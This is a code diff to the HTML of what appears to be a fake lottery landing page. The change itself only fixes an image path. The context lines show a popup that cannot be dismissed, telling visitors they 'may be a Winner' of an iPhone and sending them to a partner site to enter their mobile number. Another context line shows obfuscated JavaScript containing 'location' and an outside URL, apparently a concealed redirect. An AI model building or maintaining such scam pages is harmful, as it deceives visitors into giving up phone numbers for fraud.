--- a/pinbox/e20235231703ncash/prelp.html
+++ b/pinbox/e20235231703ncash/prelp.html
@@ -176,7 +176,7 @@ var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.c
 		}
 		function dialog3() {
 			Swal.fire({
-				imageUrl: 'img/box_iphone',
+				imageUrl: 'img/box_iphone.jpg',
 				html: '<strong>You may be a Winner of:</strong> <h2>iphone</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
